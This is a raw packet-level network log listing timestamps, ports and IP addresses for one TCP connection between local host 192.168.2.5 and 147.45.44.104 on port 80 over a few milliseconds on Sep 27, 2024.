Sep 27, 2024 00:15:16.138887882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138890982 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138902903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138916016 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138917923 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138932943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138947010 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138948917 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138961077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138972998 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.138977051 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.138992071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139005899 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139009953 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139022112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139035940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139045000 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139051914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139070988 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139096975 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139575005 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139591932 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139605999 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139620066 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139635086 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139635086 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139652014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139667034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139676094 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139682055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139697075 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139698982 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139719963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139729977 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139734983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139749050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139770031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139776945 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139784098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139797926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139803886 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139812946 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139827967 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139833927 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139843941 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139853954 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139858961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139873981 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139882088 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139889002 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139904022 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139916897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139930010 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139940023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139947891 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.139957905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.139978886 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140552998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140568972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140583992 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140594006 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140600920 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140604019 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140615940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140636921 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140642881 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140661001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140675068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140688896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140691042 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140710115 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140710115 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140723944 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140738964 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140749931 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140753031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140769005 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140774965 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140786886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140803099 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140806913 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140818119 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140831947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140846014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140852928 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140863895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140878916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140878916 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140894890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140909910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140924931 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140928984 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.140939951 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.140974045 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141469955 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141484976 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141499996 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141514063 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141515017 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141530037 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141541004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141546011 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141561031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141572952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141583920 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141587973 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141602993 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141616106 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141625881 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141629934 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141642094 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141658068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141669035 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141671896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141689062 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141693115 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141704082 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141717911 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141727924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141731977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141747952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141762018 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141774893 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141774893 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141782999 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141792059 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141807079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141820908 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141830921 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141836882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.141851902 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.141886950 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142433882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142448902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142462969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142477036 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142489910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142496109 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142505884 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142519951 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142523050 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142534971 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142543077 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142550945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142570972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142585039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142589092 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142600060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142616034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142616034 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142632008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142644882 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142646074 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142668962 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142671108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142729998 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142743111 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142757893 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142760038 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142775059 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142786026 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142790079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142807007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142821074 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142827034 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142837048 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142838955 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.142852068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.142893076 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143259048 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143275023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143287897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143301964 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143316984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143321037 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143330097 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143332005 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143347025 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143347979 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143371105 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143392086 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143393993 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143409967 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143424034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143445969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143455029 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143461943 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143476009 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143479109 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143490076 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143506050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143507004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143521070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143532038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143536091 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143553019 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143568039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143580914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143585920 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143594980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143610001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143618107 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143625021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143639088 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143646002 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143655062 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143662930 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143670082 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.143682957 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.143712044 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144195080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144210100 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144223928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144238949 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144253016 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144259930 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144273996 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144296885 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144299984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144315958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144326925 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144339085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144352913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144357920 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144368887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144383907 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144397020 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144409895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144419909 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144427061 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144442081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144443989 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144458055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144459009 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144474983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144479036 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144493103 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144510031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144521952 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144526005 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144543886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144557953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144567966 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144586086 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.144978046 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.144993067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145006895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145020962 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145032883 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145036936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145046949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145052910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145067930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145076036 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145093918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145109892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145112991 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145126104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145147085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145148039 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145170927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145184994 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145188093 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145204067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145217896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145225048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145234108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145248890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145262003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145267963 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145279884 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145288944 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145294905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145311117 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145325899 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145339966 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145354033 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145364046 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145364046 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145370007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145375013 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145385981 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145400047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145409107 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145459890 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.145976067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.145992041 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146006107 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146022081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146030903 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146042109 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146056890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146063089 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146071911 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146085978 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146100044 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146115065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146127939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146131039 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146143913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146159887 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146159887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146176100 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146189928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146190882 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146205902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146215916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146220922 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146238089 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146251917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146259069 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146267891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146281958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146294117 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146295071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146311045 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146318913 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146349907 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146708012 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146723032 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146749973 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146761894 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146765947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146780968 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146794081 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146796942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146811962 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146821022 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146826029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146847963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146857023 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146862030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146878004 CEST	80	49711	147.45.44.104	192.168.2.5
